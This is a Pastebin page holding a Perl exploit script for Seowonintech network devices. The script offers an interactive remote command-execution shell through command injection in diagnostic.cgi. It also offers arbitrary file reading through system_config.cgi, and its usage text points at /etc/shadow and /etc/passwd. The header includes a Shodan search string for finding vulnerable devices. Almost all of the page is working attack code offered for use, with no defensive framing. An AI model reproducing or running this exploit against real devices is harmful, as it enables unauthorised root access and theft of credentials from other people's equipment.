API tools faq
paste
Advertisement
hackerscommunity

Seowonintech Devices remote root exploit

hackerscommunity
Jul 11th, 2015
450
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.28 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl
  2. #
  3. # [+] Seowonintech all device remote root exploit v2
  4. # =====================================================
  5. # author: | email:
  6. # Todor Donev (latin) | todor dot donev
  7. # Тодор Донев (cyrillic) | @googlemail.com
  8. # =====================================================
  9. # type: | platform: | description:
  10. # remote | linux | attacker can get root
  11. # hardware | seowonintech | access on the device
  12. # =====================================================
  13. # greetings to:
  14. # Stiliyan Angelov,Tsvetelina Emirska,all elite
  15. # colleagues and all my friends that support me.
  16. # =====================================================
  17. # warning:
  18. # Results about 37665 possible vulnerabilities
  19. # from this exploit.
  20. # =====================================================
  21. # shodanhq dork:
  22. # thttpd/2.25b 29dec2003 Content-Length: 386 Date: 2013
  23. # =====================================================
  24. # P.S. Sorry for buggy perl.. :)
  25. # 2o13 Hell yeah from Bulgaria, Sofia
  26. #
  27. # http://www.ethical-hacker.org/
  28. # https://www.facebook.com/ethicalhackerorg
  29.  
  30. use LWP::Simple qw/$ua get/;
  31. my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
  32. if(not defined $ARGV[0])
  33. {
  34. usg();
  35. exit;
  36. }
  37. print "[+] Seowonintech all device remote root exploit\n";
  38. $diagcheck = $host."/cgi-bin/diagnostic.cgi";
  39. $syscheck = $host."/cgi-bin/system_config.cgi";
  40. $res = $ua->get($diagcheck) || die "[-] Error: $!\n";
  41. print "[+] Checking before attack..\n";
  42. if($res->status_line != 200){
  43. print "[+] diagnostic.cgi Status: ".$res->status_line."\n";
  44. }else{
  45. print "[o] Victim is ready for attack.\n";
  46. print "[o] Status: ".$res->status_line."\n";
  47. if(defined $res =~ m{selected>4</option>}sx){
  48. print "[+] Connected to $ARGV[0]\n";
  49. print "[+] The fight for the future Begins\n";
  50. print "[+] Exploiting via remote command execution..\n";
  51. print "[+] Permission granted, old friend.\n";
  52. &rce;
  53. }else{
  54. print "[!] Warning: possible vulnerability.\n";
  55. exit;
  56. }
  57. }
  58. $res1 = $ua->get($syscheck) || die "[-] Error: $!\n";
  59. if($res1->status_line != 200){
  60. print "[+] system_config.cgi Status: ".$res1->status_line."\n";
  61. exit;
  62. }else{
  63. print "[+] Trying to attack via remote file disclosure release.\n";
  64. if(defined $syscheck =~ s/value=\'\/etc\/\'//gs){
  65. print "[+] Victim is ready for attack.\n";
  66. print "[+] Connected to $ARGV[0]\n";
  67. print "[o] Follow the white cat.\n";
  68. print "[+] Exploiting via remote file dislocure..\n";
  69. print "[+] You feeling lucky, Neo?\n";
  70. &rfd;
  71. }else{
  72. print "[!] Warning: Possible vulnerability. Believe the unbelievable!\n";
  73. exit;
  74. }
  75. }
  76. sub rfd{
  77. while(1){
  78. print "# cat ";
  79. chomp($file=<STDIN>);
  80. if($file eq ""){ print "Enter full path to file!\n"; }
  81. $bug = $host."/cgi-bin/system_config.cgi?file_name=".$file."&btn_type=load&action=APPLY";
  82. $data=get($bug) || die "[-] Error: $ARGV[0] $!\n";
  83. $data =~ s/Null/File not found!/gs;
  84. if (defined $data =~ m{rows="30">(.*?)&lt;/textarea&gt;}sx){
  85. print $1."\n";
  86. }
  87. }
  88. }
  89. sub rce{
  90. while(1){
  91. print "# ";
  92. chomp($rce=<STDIN>);
  93. $bug = $host."/cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;".$rce.";&ping_count=1&action=Apply&html_view=ping";
  94. $rce =~ s/\|/\;/;
  95. if($rce eq ""){print "enter Linux command\n";}
  96. if($rce eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
  97. if($rce eq "exit" || $rce eq "quit"){print "There is no spoon...\n"; exit;}
  98. $data=get($bug) || die "[-] Error: $!\n";
  99. if (defined $data =~ m{(\s.*) Content-type:}sx){
  100. $result = substr $1, index($1, ' loss') or substr $1, index($1, ' ms');
  101. $result =~ s/ loss\n//;
  102. $result =~ s/ ms\n//;
  103. print $result;
  104. }
  105. }
  106. }
  107. sub usg
  108. {
  109. print " [+] Seowonintech all device remote root exploit\n";
  110. print " [!] by Todor Donev todor dot donev @ googlemail.com\n";
  111. print " [?] usg: perl $0 <victim>\n";
  112. print " [?] exmp xpl USG: perl $0 192.168.1.1 :)\n";
  113. print " [1] exmp xpl RCE: # uname -a :)\n";
  114. print " [2] exmp xpl RFD: # cat /etc/webpasswd or /etc/shadow, maybe and /etc/passwd :P\n";
  115. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!